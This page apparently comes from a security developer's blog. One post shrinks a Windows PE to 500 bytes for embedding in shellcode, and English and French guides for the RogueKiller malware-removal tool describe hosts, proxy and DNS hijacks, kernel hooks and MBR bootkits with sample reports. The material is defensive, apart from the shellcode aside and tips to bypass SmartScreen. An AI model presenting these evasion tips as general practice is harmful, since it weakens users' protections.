tigzy-RK

[Analysis] PE Structure - Make the smallest executable

2012-11-29T02:36:00.000-08:00

PE Structure

Make the smallest executable

Recently I faced a problem in my devs. I needed an executable that does nothing, but the smallest possible (to include it in a shellcode).

Here's the C++ code:

#include windows.h
int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
 return 0;
}

Nothing complicated.
I followed this tutorial to reduce the size of the PE : http://thelegendofrandom.com/blog/archives/2231

And it led to a tiny PE (1 ko). But not enough for me.
Then I followed this tutorial : http://win32assembly.programminghorizon.com/pe-tut1.html
and took this reference poster : http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf
Updated here: http://blog.dkbza.org/2012/08/pe-file-format-graphs.html

I removed lots of null bytes, and modified the parameters to adjust both size and section offset. To finish, I loaded the PE into OllyDbg and modified the Entry point (which was not at the good place).

My PE is now 500 bytes, and fully functional.
Here's a schematic of the final PE structure. It can help to understand how a PE is structured.

REFERENCES

http://win32assembly.programminghorizon.com/pe-tut1.html
http://thelegendofrandom.com/blog/archives/2231
http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf
http://blog.dkbza.org/2012/08/pe-file-format-graphs.html

[EN] RogueKiller official tutorial

2012-11-26T07:57:00.001-08:00

RogueKiller : Official tutorial

This is a user guide for RogueKiller, a malware removal tool which can be downloaded here:

_ RogueKiller _

RogueKiller can be used on Windows XP, Server 2003, Vista, Server 2008, Win7, Win8.
RogueKiller can be used on both 32 bits and 64 bits operating systems.

Begin to download the tool on the desktop, and then quit all running programs.
Start RogueKiller.exe. If the program has been blocked, try to rename it by winlogon.exe, or change its file extension by .com (ex: Roguekiller.com)

VIDEO PRESENTATION (French)

SMARTSCREEN

On recent OS (Windows 7 / Windows 8), the SmartScreen filter disallow the start of unknown programs (from Microsoft). To pass through this protection and be able to start RogueKiller, do the following:

Click on More infos
Next click on Run anyway.

PRESCAN

The Prescan is started as soon as you start RogueKiller. It scans and stops malicious processes, malicious services, load its driver and do some version checks. It does not delete anything on the computer, so at this moment a simple reboot restores everything in the initial state (malwares included). No action of the user is required.

RogueKiller may detect a new version available, and offer to download it. The user can either accept (and be redirected to the download page) or decline. In this case, one can continue to use the program anyway with the outdated version. It is strongly advised to always run the latest version!

The list of stopped processes / services can be found in the Processes tab.

Important! The "driver" icon (green/red square) turns to green once the driver is loaded. The driver cannot be loaded on 64 bits operating systems.

SCAN

The scan is triggered with the Scan button. This is the first natural step once the Prescan finished.

The scan is a processing that does not modifies the system, because it only lists the problems to display them at the user. Among these operations, a check of the automatic startup entries (RUN keys, Services, scheduled tasks, startup folders), and more generally of the system hijacks. The scan do also a search of some known infections, and check the existence of some rootkits in the kernel (with its driver). To finish, it verifies the integrity of the Master Boot Record (MBR).

Once the scan finished, a text report is available by clicking on the Report button. It is also available on the desktop (RKReport[#].txt).

Scan

SUPPRESSION

The deletion is triggered by clicking on the Delete button.. Before, the user must check the results of the previous scan into the different tabs, or with the text report. The deleted/restored items will be only those in the Registry or Files tabs. If you're in doubt, please see following sections on the deep analysis.

If some items looks legit, you have the possibility to uncheck them (Registry tab only) before the deletion (and notify them to the developer by email, please). Unlike the scan, the deletion modifies the system, because this is the way malwares must be deleted. However, every modified registry key is first saved in the RK_Quarantine folder (see below).

Once the deletion finished, a text report is available by clicking on the Report button. It is also available on the desktop (RKReport[#].txt). The program may ask to reboot the PC. If this happens, you should accept because some malwares can only be removed after a reboot and could be reactivated otherwise.

Delete

HOST RAZ

The Hosts file is a Windows configuration file, allowing to make redirections of domain names to some IPs. We usually use it to forbid the access to a website, or to bind local addresses (ex: 192.168.1.12) to a textual address (ex: http://test.com). Here's some legit redirections examples:

127.0.0.1 localhost (by default in the windows hosts file)
127.0.0.1 www.malware_website.com (forbid the access to a dangerous website)
192.168.1.12 my_local_website (bind a textual address to a local IP)

Malwares can use it to redirect legit web addresses to malware servers, and by the way infect new users. Here's an example of malware usage:

123.456.789.10 www.google.com (redirect a well known website to an unknown IP - the malware server)
165.498.156.14 www.facebook.com (redirect a well known website to an unknown IP - the malware server)

These lines must be removed.
The hosts file content is displayed after a Scan in the Hosts tab, or in the section with the same name in the report. The Hosts Fix button can be used to reset the file's content with the only existing line by default: 127.0.0.1 localhost
Once the reset finished, a text report is available by clicking on the Report button. It is also available on the desktop (RKReport[#].txt).

Here's an example of malware hosts section:

¤¤¤ HOSTS file: ¤¤¤
--> C:\Windows\system32\drivers\etc\hosts

127.0.0.1 localhost
::1 localhost
64.46.36.178 www.google-analytics.com.
64.46.36.178 ad-emea.doubleclick.net.
64.46.36.178 www.statcounter.com.
64.27.10.42 www.google-analytics.com.
64.27.10.42 ad-emea.doubleclick.net.
64.27.10.42 www.statcounter.com.

After Hosts Fix, here's the new content:

¤¤¤ HOSTS file: ¤¤¤

--> C:\Windows\system32\drivers\etc\hosts

127.0.0.1 localhost

Hosts

PROXY RAZ

The proxy configuration is a web access policy, allowing to redirect incoming and outgoing internet stream to an IP on a particular port. This is usually used in an enterprise network, to filter access to the internet (the proxy is a computer of the network), or when we want to filter the internet stream with a software installed on the computer (the proxy is then the localhost address - 127.0.0.1:xx).

A malware can also use the proxy configuration to filter web accesses, and then:

Protect himself from downloading antivirus softwares (by blocking the corresponding pages and searchs)
Sniff the internet traffic (and get passwords, session cookies, ...).
Redirect user to malware websites, or on ads.
...

Here's an example of proxy configuration. It's hard to determine if it's legit or not without knowledge of the network architecture of the user. Usually, only the user can determine if he uses or not that kind of proxy.

¤¤¤ Registry: 3 ¤¤¤
[PROXY IE] HKCU\[...]\Internet Settings : ProxyEnable (1) -> FOUND
[PROXY IE] HKCU\[...]\Internet Settings : ProxyServer (10.25.52.205:8080) -> FOUND
[PROXY FF] n2aqvo03.default\ 10.25.52.205:8080 -> FOUND

Above lines are showing proxy configuration on both Internet Explorer and Firefox.
If such a configuration is defined, then it will be displayed after a Scan in the Proxy tab, or in the Registry section of the report. The Proxy Fix button switches every proxy off.

Once the reset finished, a text report is available by clicking on the Report button. It is also available on the desktop (RKReport[#].txt).

Proxy/DNS

DNS RAZ

The DNS configuration is web access policy, allowing to redirect the internet stream to a particular IP. In a normal use, DNS configuration is used to define the DNS server you want to use to resolve textual names into IPs. Usually, users put the address of a dedicated server of their network, or use the DNS server of their ISP. A DNS server is used to resolve host names (www.google.fr) into IPs addresses (173.194.67.94).

Malwares can modify DNS configuration to redirect host name resolution to a malware server. By doing so, a malware server can send fake IPs to legit resolution queries, and fool the user who will be redirected on malware website and be infected with another piece of malware. An example of well known malware is DNS Changer.

Here's an example of DNS configuration. RogueKiller does a filtering on IPs with whitelist, so if a line appears, it has not being identified as legit. Then you have to check on which country the IP points to and take a decision.

¤¤¤ Registry: 3 ¤¤¤
[DNS] HKLM\[...]\ControlSet001\
Services\Interfaces\{E3608E44-...} : NameServer (200.13.249.101,200.13.224.254) -> FOUND
[DNS] HKLM\[...]\ControlSet002\Services\Interfaces\{E3608E44-...} : NameServer (200.13.249.101,200.13.224.254) -> FOUND

The above lines are showing a DNS configuration on a single network controller (Interface). If a DNS configuration is defined, it will be displayed after a Scan in the DNS tab, or in the Registry section of the report. The DNS Fix button permits to reset the DNS configuration.

Once the reset done, a text report is available by clicking on the Report button. It is also available on the desktop (RKReport[#].txt).

Proxy/DNS

Shortcut Fix

The Shortcut Fix mode can be used to unhide files/folders/shortcuts that have been hidden by rogues called Fake HDD (System restore, File restore, System Fix, ...). A demonstration is available in the following video. This mode should not be used at any time, use it only in that kind of infection! The processing can take time (few minutes), please be patient.

Here's an example of report. It's showing in which directories hidden items has been found, and restored, and how many.
The backup directory is a special place where Fake HDD malware stores the shortcuts it has moved (Startup menu, quick launch, desktop, ...) The number of items for this line corresponds to the number of items moved back.
The Drive section shows which drive has been treated or skipped.

¤¤¤ File attributes restored: ¤¤¤
Desktop: Success 6675 / Fail 0
Quick launch: Success 7 / Fail 0
Programs: Success 24786 / Fail 0
Start menu: Success 430 / Fail 0
User profile: Success 6583 / Fail 0
My documents: Success 131315 / Fail 0
My favourites: Success 8 / Fail 0
My pictures: Success 0 / Fail 0
My music: Success 0 / Fail 0
My videos: Success 0 / Fail 0
Local drives: Success 44060 / Fail 0
Backup: [FOUND] Success 125468 / Fail 0 / Exists 1

Drives:
[C:] \Device\HarddiskVolume1 -- 0x3 --> Restored
[D:] \Device\CdRom0 -- 0x5 --> Skipped
[Z:] \Device\VBoxMiniRdr\;Z:\VBOXSVR\Shared -- 0x4 --> Skipped

Once the reset finished, a text report is available by clicking on the Report button. It is also available on the desktop (RKReport[#].txt).

Shortcut fix

DRIVER TAB

The Driver tab shows all informations of the TrueSight module, the kernel driver of RogueKiller. The driver is mostly used for searching rootkits in the Windows kernel. The research is done is several sections:

- System Service Dispatch Table (SSDT) - Shows the hooked APIs.
- Shadow SSDT (S_SSDT) - Shows the hooked APIs.
- Inline SSDT - Shows the APIs hooked with hot patching.
- IRP hook - Shows the drivers with hooked major functions.

It's possible to deactivate the rootkit scan by unchecking the Antirootkit checkbox before to start the scan.

It's possible to restore some hooks (SSDT and Inline SSDT) by right click on a line, restore. If the hook is legit (some antivirus use these tips) then it will not be possible to restore the hook. RogueKiller maintains a whitelist of drivers, but it's possible some don't appears as legit while they are (please tell me if you face such thing).

The kernel hooks (legit or not) are listed in the report too, in the Driver section. We can get the API name, its address, and the name of the hooking drivers.

¤¤¤ Driver : [LOADED] ¤¤¤
SSDT[119] : NtOpenKey @ 0x80624BA6 -> HOOKED (\??\C:\WINDOWS\TEMP\rqmqbqga.sys @ 0xF783E562)
SSDT[57] : NtDebugActiveProcess @ 0x80643B3E -> HOOKED (Unknown @ 0x89C30200)
SSDT[68] : NtDuplicateObject @ 0x805BE010 -> HOOKED (Unknown @ 0x89C302F0)
SSDT[277] : NtWriteVirtualMemory @ 0x805B43D4 -> HOOKED (Unknown @ 0x89C306D0)
IRP[IRP_MJ_CREATE] : Unknown -> HOOKED ([MAJOR] atapi.sys @ 0xB7DF3B40)
IRP[IRP_MJ_CLOSE] : Unknown -> HOOKED ([MAJOR] atapi.sys @ 0xB7DF3B40)
IRP[DriverStartIo] : Unknown -> HOOKED ([MAJOR] atapi.sys @ 0xB7DF1864)

MBR TAB

The MBR tab displays informations about the Master Boot Record (MBR) of the PC. This is the very first sector on the hard drive, which contains both informations about the size/location of partitions and a bootstrap code, which permits to launch the operating system of a bootable disk.

Some malwares known as Bootkit, like TDSS, MaxSST or Stoned modify either the code (bootstrap) to launch their own modules, or the partition table to boot on a fake partition and do some processing right before the operating system starts (and the antivirus protections!).

RogueKiller allows to detect and remove bootkits, even when they try to hide themselves.
Some hints can show that a MBR is legit: The bootstrap is known, and legit. Then, the different attempts to read the MBR (at different levels) return the same results (this means the MBR is not hidden).

Here's an example of clean MBR. The bootstrap (BSP) is legit (Windows XP), and the User read, LL1 and LL2 return the same things.

¤¤¤ MBR Verif: ¤¤¤

+++++ PhysicalDrive0: VBOX HARDDISK +++++
--- User ---
[MBR] c708b764ca9daa4f8f33e4e8b3b517da
[BSP] f4eb87199eee8a432bb482bb55118447 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 63 | Size: 4086 Mo
User = LL1 ... OK!
User = LL2 ... OK!

Here's an example with infectious MBR. The bootstrap (BSP) is legit (Windows 7), but the LL1 methods returns something different. Finally, there is a ghost partition hidden by rootkit (MaxSST).

¤¤¤ MBR Verif: ¤¤¤

+++++ PhysicalDrive0: Hitachi HDS721032CLA362 +++++
--- User ---
[MBR] a1e2c1a0c1fb3db806dcbb65fdbf8384
[BSP] 0dc0d942fc9152dc059c7e021d2ad3db : Windows 7 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 2048 | Size: 100 Mo
1 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 206848 | Size: 305129 Mo
User != LL1 ... KO!
--- LL1 ---
[MBR] 501fcd9f60449033a7b892d424337896
[BSP] 0dc0d942fc9152dc059c7e021d2ad3db : Windows 7 MBR Code [possible maxSST in 2!]
Partition table:
0 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 2048 | Size: 100 Mo
1 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 206848 | Size: 305129 Mo
2 - [ACTIVE] NTFS (0x17) [HIDDEN!] Offset (sectors): 625113088 | Size: 10 Mo

Here's another example of infectious MBR. The bootstrap (BSP) is infected with MaxSS.t.

¤¤¤ MBR Check: ¤¤¤

+++++ PhysicalDrive0: ST9500325AS +++++
--- User ---
[MBR] 318e94ac5cf893f8e2ed0643494e740e
[BSP] 07a9005ccf77d28c668138e4d4a42d65 : MaxSS MBR Code!
Partition table:
0 - [XXXXXX] FAT32-LBA (0x1c) [HIDDEN!] Offset (sectors): 2048 | Size: 13000 Mo
1 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 26626048 | Size: 119235 Mo
2 - [XXXXXX] EXTEN-LBA (0x0f) [VISIBLE] Offset (sectors): 270819328 | Size: 344703 Mo
User = LL1 ... OK!
User = LL2 ... OK!

It is possible to deactivate the MBR scan before to launch the scan by unchecking the MBR checkbox.

When a MBR is infected, it is possible to restore it. Depending on the kind of infection, there can have several cases.

If the MBR is hidden (User != LLx ... KO!), then we can restore the original MBR automatically. The user only have to choose the corresponding index in PhysicalDrive, and click on MBR Fix.

If the MBR has been erased, there is no backup available. We can then restore a default MBR, by choosing in a list of operating systems (Windows XP, Vista, Seven). The user only have to choose the corresponding index in PhysicalDrive, the operating system and click on MBR Fix.

ROGUEKILLER PE

RogueKiller is now able to read Windows hives in Offline. It means RogueKiller is able to:

Detect hidden registry keys (rootkit)
Detect and remove registry keys from an operating system in an external hard drive (other than system hard drive).
Detect and remove registry keys of a PC started from a live CD (ex: OTLPE)

This can be useful when a rootkit hides/protects its registry keys, or when a PC is locked by a ransomware.

Here's a demonstration of the PE mode on a PC infected with the malware Gendarmerie, and started with live CD OTLPE:

[FR] RogueKiller tutoriel officiel

2012-10-30T07:39:00.000-07:00

RogueKiller : Tutoriel officiel

Ceci est un guide d'utilisation de RogueKiller, outil de désinfection antivirus que l'on peut télécharger ici :

_ RogueKiller _

RogueKiller est compatible Windows XP, Server 2003, Vista, Server 2008, Win7, Win8.
RogueKiller est compatible avec les Systèmes 32 bits et 64 bits.

Commencer par télécharger l'outil sur le bureau, et quitter tous les programmes en cours.
Lancer RogueKiller.exe. Si le programme est tué par un malware, ne pas hesiter à renommer l'exécutable en winlogon.exe, ou changer l'extension de fichier en .com (ex: Roguekiller.com)

PRESENTATION VIDEO

SMARTSCREEN

Sous les systèmes d'exploitation récents (Windows 7 / Windows 8), le filtre SmartScreen empêche l'exécution de programmes inconnus (de Microsoft). Pour passer outre cette protection et pouvoir lancer RogueKiller, procéder comme suit:

Cliquer sur Informations complémentaires
Puis sur Exécuter quand même.

PRESCAN

Le Prescan est démarré automatiquement au lancement du programme. Il a pour effet de stopper les processus nuisibles, stopper les services infectieux, charger le driver et faire des vérifications de version. A ce stade aucune action de l'utilisateur n'est requise, car tout le traitement est réversible par un simple redémarrage du PC et est donc inoffensif.

Il se peut que RogueKiller détecte une nouvelle version disponible et propose son téléchargement. Dans ce cas, on peut soit accepter et être redirigé vers la page de téléchargement ou refuser et continuer l'utilisation normale avec la version périmée. Il est très fortement conseillé de toujours lancer la version la plus récente!

La liste des processus / services stoppés se trouve dans l'onglet Processus.

Note importante! L'icone "driver" (carré vert/rouge) ne vire au vert que lorsque le driver est chargé. Le driver ne peut pas être chargé sur des OS 64 bits.

SCAN

Le scan est déclenché par appui sur le bouton Scan. C'est la première étape naturelle à effectuer après la fin du Prescan.

Le scan est un traitement n'apportant aucune modification sur le système, car il ne fait que répertorier les anomalies rencontrées et les afficher à l'utilisateur. Parmi les opérations effectuées, une vérification des entrées de démarrage automatique (clés RUN, Services, Taches planifiées, dossiers de démarrages), et des détournements du fonctionnement normal de Windows. Le scan fait aussi une recherche de certaines infections connues, ainsi qu'une vérification de la présence de rootkits au sein du noyau (avec l'aide du driver) et pour terminer une vérification du secteur de démarrage (MBR).

Une fois le scan terminé, un rapport texte est disponible en cliquant sur le bouton Rapport. Ce dernier est aussi sur le bureau (RKReport[#].txt).

Déclenchement du scan

SUPPRESSION

La suppression est déclenchée par appui sur le bouton Suppression. Au préalable il conviendra de vérifier les résultats du scan dans les différents onglets, ou par le rapport texte. Les éléments supprimés/restaurés sont uniquement ceux de l'onglet Registre et de l'onglet Fichiers. Si vous avez des doutes, voir les sections suivantes sur les compléments d'analyse.

Si certaines choses vous paraissent anormales et ne doivent pas être supprimées, vous avez la possibilité de les décocher (onglet Registre seulement) avant la suppression (et me les signaler par mail!). Contrairement au scan, la suppression fait des modification sur le système, car c'est ce qui permet de supprimer les infections. Toutefois, chaque clé de registre modifiée est au préalable sauvegardée dans le dossier RK_Quarantine (voir ci-après).

Une fois la suppression terminé, un rapport texte est disponible en cliquant sur le bouton Rapport. Ce dernier est aussi sur le bureau (RKReport[#].txt). Il se peut également que le programme demande à redémarrer le PC. Si c'est le cas, il faut le faire impérativement car certaines infections pourraient avoir le temps de se réactiver dans le cas contraire.

Déclenchement de la suppression

HOST RAZ

Le fichier Hosts est un fichier de configuration Windows, permettant d'effectuer des redirections de noms de domaines vers des IPs définies. On l'utilise principalement pour interdire l'accès à une adresse internet, ou pour associer une adresse textuelle (ex: http://test.com) vers une adresse IP du réseau local (ex: 192.168.1.12). Voici quelques exemples de redirections Hosts légitimes:

127.0.0.1 localhost (ligne par defaut dans le fichier hosts)
127.0.0.1 www.site_de_virus.com (empêche l'accès a des sites dangereux)
192.168.1.12 mon_site_en_local (associe une adresse textuelle à une IP du réseau local)

Les malwares peuvent utiliser le fichier Hosts pour rediriger des adresses web légitimes vers des serveurs vérolés, et ainsi infecter de nouveaux utilisateurs. Voici un exemple de lignes malwares:

123.456.789.10 www.google.com (redirige un site bien connu vers une adresse IP inconnue - le serveur vérolé)
165.498.156.14 www.facebook.com (redirige un site bien connu vers une adresse IP inconnue - le serveur vérolé)

Ces lignes doivent être supprimées.
Le contenu du fichier Hosts de Windows est visible après un Scan dans l'onglet Hosts, ou dans la section du même nom dans le rapport. Le bouton Host RAZ permet de réinitialiser le contenu du fichier hosts avec la ligne par défaut présente à l'installation de Windows, à savoir : 127.0.0.1 localhost
Une fois la réinitialisation terminé, un rapport texte est disponible en cliquant sur le bouton Rapport. Ce dernier est aussi sur le bureau (RKReport[#].txt).

Voici un exemple de section Hosts vérolée:

¤¤¤ Fichier HOSTS: ¤¤¤
--> C:\Windows\system32\drivers\etc\hosts

127.0.0.1 localhost
::1 localhost
64.46.36.178 www.google-analytics.com.
64.46.36.178 ad-emea.doubleclick.net.
64.46.36.178 www.statcounter.com.
64.27.10.42 www.google-analytics.com.
64.27.10.42 ad-emea.doubleclick.net.
64.27.10.42 www.statcounter.com.

Après passage du Hosts RAZ, le contenu du rapport est le suivant:

¤¤¤ Fichier HOSTS: ¤¤¤

--> C:\Windows\system32\drivers\etc\hosts

127.0.0.1 localhost
::1 localhost

Déclenchement de la réinitialisation du fichier Hosts

PROXY RAZ

La configuration proxy est une configuration particulière d'accès au web, permettant de rediriger le flux internet entrant et sortant vers une adresse IP et un port particulier. Cela est surtout utilisé lorsque dans une entreprise un accès internet est filtré par un serveur du réseau (l'adresse du proxy est alors une IP du réseau local), ou lorsqu'on veut filtrer le traffic internet par un logiciel installé en local (l'adresse du proxy est alors celle du localhost - 127.0.0.1 sur un port particulier)

Un malware peut également modifier la configuration proxy pour filtrer les accès au web, et ainsi:

Se protéger du téléchargement de logiciels antivirus (en bloquant les pages web associées).
Sniffer le traffic internet (et récupérer les mot de passes éventuels, les cookies de session, ...).
Rediriger l'utilisateur vers des sites vérolés, ou sur des publicités.
...

Voici un exemple de configuration proxy. Il est difficile sans connaitre l'architecture réseau de la personne concernée de savoir si ce dernier est légitime ou non. En général, seul l'utilisateur sait s'il doit utiliser ou non un proxy.

¤¤¤ Entrees de registre: 3 ¤¤¤
[PROXY IE] HKCU\[...]\Internet Settings : ProxyEnable (1) -> FOUND
[PROXY IE] HKCU\[...]\Internet Settings : ProxyServer (10.25.52.205:8080) -> FOUND
[PROXY FF] n2aqvo03.default\ 10.25.52.205:8080 -> FOUND

Les lignes précédentes montrent une configuration Proxy à la fois pour Internet Explorer (paramètres proxy du système) et pour Mozilla Firefox.
Si une configuration proxy est définie, alors elle sera visible après un Scan dans l'onglet Proxy, ou dans la section Registre dans le rapport. Le bouton Proxy RAZ permet de réinitialiser la configuration proxy.

Une fois la réinitialisation terminé, un rapport texte est disponible en cliquant sur le bouton Rapport. Ce dernier est aussi sur le bureau (RKReport[#].txt).

Déclenchement de la réinitialisation de la configuration Proxy/DNS

DNS RAZ

La configuration DNS est une configuration particulière d'accès au web, permettant de rediriger le flux internet entrant vers une adresse IP particuliere. A la base, la configuration DNS sert à définir le serveur DNS que l'on souhaite utiliser. En général, les utilisateurs mettent soit un serveur DNS dédié sur le réseau (en entreprise) soit celui de leur fournisseur d'accès internet.Un serveur DNS est utilisé pour la résolution des noms d'hôtes, en simplifié à associer un nom de domaine (www.google.fr) à une adresse IP (173.194.67.94).

Un malware peut modifier la configuration DNS pour envoyer les demandes de résolution vers un serveur vérolé. De cette manière, un serveur DNS vérolé peut renvoyer de mauvaises adresses IP à des demandes de sites légitimes, et ainsi tromper l'utilisateur qui va se retrouver sur un site vérolé au lieu d'un site légitime. Un exemple de malware très connu utilisant ce genre d'attaques est DNS Changer.

Voici un exemple de configuration DNS. RogueKiller effectue un premier tri grâce à une liste blanche, donc si une ligne apparait dans le programme, c'est qu'elle n'a pas été identifiée comme légitime. A partir de là, il faut donc regarder vers quel pays/herbergeur pointe l'adresse IP et prendre une décision.

¤¤¤ Entrees de registre: 3 ¤¤¤
[DNS] HKLM\[...]\ControlSet001\
Services\Interfaces\{E3608E44-...} : NameServer (200.13.249.101,200.13.224.254) -> FOUND
[DNS] HKLM\[...]\ControlSet002\Services\Interfaces\{E3608E44-...} : NameServer (200.13.249.101,200.13.224.254) -> FOUND

Les lignes précédentes montrent une configuration DNS concernant une seule carte réseau (Interface)
Si une configuration DNS est définie, alors elle sera visible après un Scan dans l'onglet DNS, ou dans la section Registre dans le rapport. Le bouton DNS RAZ permet de réinitialiser la configuration DNS.

Une fois la réinitialisation terminé, un rapport texte est disponible en cliquant sur le bouton Rapport. Ce dernier est aussi sur le bureau (RKReport[#].txt).

Déclenchement de la réinitialisation de la configuration Proxy/DNS

Racc. RAZ

Le mode Raccourci RAZ permet de faire réapparaitre des fichiers/raccourcis ou dossiers ayant été masqué par les rogues de type Fake HDD (System restore, File restore, System Fix, ...). Une démonstration est proposée dans la vidéo ci-après. Ce mode n'est pas à utiliser à la légère, ne l'utiliser réellement que dans ce type d'infection! Le traitement peut prendre du temps (quelques minutes), merci de patienter jusqu'à la fin.

Voici un exemple de rapport obtenu dans ce mode. Ce dernier montre dans quels répertoire il a retrouvé et restauré des fichiers cachés, et combien.
Le répertoire Sauvegarde correspond à un endroit bien précis ou le malware Fake HDD déplace les raccourci du menu démarrer, du bureau, ... Le nombre de fichiers restaurés dans cette ligne correspond à ce qui a pu être retrouvé et remis à sa place. La section Lecteurs montre les lecteurs physiques traités (Restored) ou ignorés (Skipped).

¤¤¤ Attributs de fichiers restaures: ¤¤¤
Bureau: Success 6675 / Fail 0
Lancement rapide: Success 7 / Fail 0
Programmes: Success 24786 / Fail 0
Menu demarrer: Success 430 / Fail 0
Dossier utilisateur: Success 6583 / Fail 0
Mes documents: Success 131315 / Fail 0
Mes favoris: Success 8 / Fail 0
Mes images: Success 0 / Fail 0
Ma musique: Success 0 / Fail 0
Mes videos: Success 0 / Fail 0
Disques locaux: Success 44060 / Fail 0
Sauvegarde: [FOUND] Success 125468 / Fail 0 / Exists 1

Lecteurs:
[C:] \Device\HarddiskVolume1 -- 0x3 --> Restored
[D:] \Device\CdRom0 -- 0x5 --> Skipped
[Z:] \Device\VBoxMiniRdr\;Z:\VBOXSVR\Shared -- 0x4 --> Skipped

Une fois la réinitialisation terminé, un rapport texte est disponible en cliquant sur le bouton Rapport. Ce dernier est aussi sur le bureau (RKReport[#].txt).

Déclenchement de la réinitialisation des raccourcis

ONGLET DRIVER

L'onglet Driver regroupe toutes les informations provenant du module TrueSight, le driver kernel de RogueKiller. Ce driver est surtout utilisé pour la recherche de rootkits dans le noyau Windows.
La recherche concerne plusieurs sections:

- System Service Dispatch Table (SSDT) - Montre les APIs détournées.
- Shadow SSDT (S_SSDT) - Montre les APIs détournées
- Inline SSDT - Montre les APIs détournées par hot patching.
- IRP hook - Montre les drivers dont les fonctions majeures sont détournées

Il est possible de désactiver le scan anti-rootkit avant d'effectuer le scan en décochant la case AntiRootkit.

Il est possible de restaurer certains détournements (SSDT et Inline SSDT) par un clic droit, restaurer. Si le détournement est légitime (en effet, la plupart des antivirus utilisent ces techniques pour fonctionner) il ne sera pas possible de le restaurer. RogueKiller fonctionne sur une base de liste blanche de drivers, mais il est possible que certains détournements ne soient pas listés (Si c'est le cas, merci de le signaler).

Les détournement du noyau (illégitimes ou suspects) sont listés également à l'édition du rapport, dans la section Driver. on y retrouve le nom de l'API, l'adresse et le nom du driver détournant cette dernière.

¤¤¤ Driver : [CHARGE] ¤¤¤
SSDT[119] : NtOpenKey @ 0x80624BA6 -> HOOKED (\??\C:\WINDOWS\TEMP\rqmqbqga.sys @ 0xF783E562)
SSDT[57] : NtDebugActiveProcess @ 0x80643B3E -> HOOKED (Unknown @ 0x89C30200)
SSDT[68] : NtDuplicateObject @ 0x805BE010 -> HOOKED (Unknown @ 0x89C302F0)
SSDT[277] : NtWriteVirtualMemory @ 0x805B43D4 -> HOOKED (Unknown @ 0x89C306D0)
IRP[IRP_MJ_CREATE] : Unknown -> HOOKED ([MAJOR] atapi.sys @ 0xB7DF3B40)
IRP[IRP_MJ_CLOSE] : Unknown -> HOOKED ([MAJOR] atapi.sys @ 0xB7DF3B40)
IRP[DriverStartIo] : Unknown -> HOOKED ([MAJOR] atapi.sys @ 0xB7DF1864)

ONGLET MBR

L'onglet MBR liste et affiche les informations concernant le(s) Master Boot Record (MBR) du PC. Ce dernier est le premier secteur physique d'un disque dur, contenant à la fois des informations sur la taille et la localisation des différentes partitions logiques, ainsi que le code chargé de lancer le système d'exploitation d'un disque bootable.

Certains malwares appelés Bootkit, comme TDSS, MaxSST ou Stoned modifient soit le code (bootstrap) pour lancer leurs propres composants, soit la table des partitions pour booter sur une partition fantôme et ainsi effectuer des traitements avant le lancement du système d'exploitation (et des antivirus!).

RogueKiller permet de détecter et supprimer les bootkits, même lorsqu'ils masquent leur présence.
Plusieurs indicateurs montrent la légitimité d'un MBR: Le bootstrap est connu, et légitime. Ensuite, la lecture à différents niveaux d’abstraction retourne les même résultats (ce qui signifie que le MBR n'est pas masqué).

Voici un exemple de rapport sain. Le bootsrap (BSP) est légitime (Windows XP), et la lecture User, LL1 et LL2 renvoient les mêmes résultats.

¤¤¤ MBR Verif: ¤¤¤

+++++ PhysicalDrive0: VBOX HARDDISK +++++
--- User ---
[MBR] c708b764ca9daa4f8f33e4e8b3b517da
[BSP] f4eb87199eee8a432bb482bb55118447 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 63 | Size: 4086 Mo
User = LL1 ... OK!
User = LL2 ... OK!

Voici un exemple de rapport présentant un MBR infecté. Le bootsrap (BSP) est légitime (Windows 7), mais la méthode LL1 renvoit quelque chose de différent. Enfin et surtout, il existe une partition fantôme masqué par le rootkit (MaxSST).

¤¤¤ MBR Verif: ¤¤¤

+++++ PhysicalDrive0: Hitachi HDS721032CLA362 +++++
--- User ---
[MBR] a1e2c1a0c1fb3db806dcbb65fdbf8384
[BSP] 0dc0d942fc9152dc059c7e021d2ad3db : Windows 7 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 2048 | Size: 100 Mo
1 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 206848 | Size: 305129 Mo
User != LL1 ... KO!
--- LL1 ---
[MBR] 501fcd9f60449033a7b892d424337896
[BSP] 0dc0d942fc9152dc059c7e021d2ad3db : Windows 7 MBR Code [possible maxSST in 2!]
Partition table:
0 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 2048 | Size: 100 Mo
1 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 206848 | Size: 305129 Mo
2 - [ACTIVE] NTFS (0x17) [HIDDEN!] Offset (sectors): 625113088 | Size: 10 Mo

Voici un autre exemple de rapport présentant un MBR infecté. Le bootsrap (BSP) est infecté avec le rootkit MaxSST.

¤¤¤ MBR Check: ¤¤¤

+++++ PhysicalDrive0: ST9500325AS +++++
--- User ---
[MBR] 318e94ac5cf893f8e2ed0643494e740e
[BSP] 07a9005ccf77d28c668138e4d4a42d65 : MaxSS MBR Code!
Partition table:
0 - [XXXXXX] FAT32-LBA (0x1c) [HIDDEN!] Offset (sectors): 2048 | Size: 13000 Mo
1 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 26626048 | Size: 119235 Mo
2 - [XXXXXX] EXTEN-LBA (0x0f) [VISIBLE] Offset (sectors): 270819328 | Size: 344703 Mo
User = LL1 ... OK!
User = LL2 ... OK!

Il est possible de désactiver le scan MBR avant d'effectuer le scan en décochant la case MBR.

En cas d'infection MBR, il est possible de restaurer le MBR. Selon le cas de figure, cela peut se passer différemment.

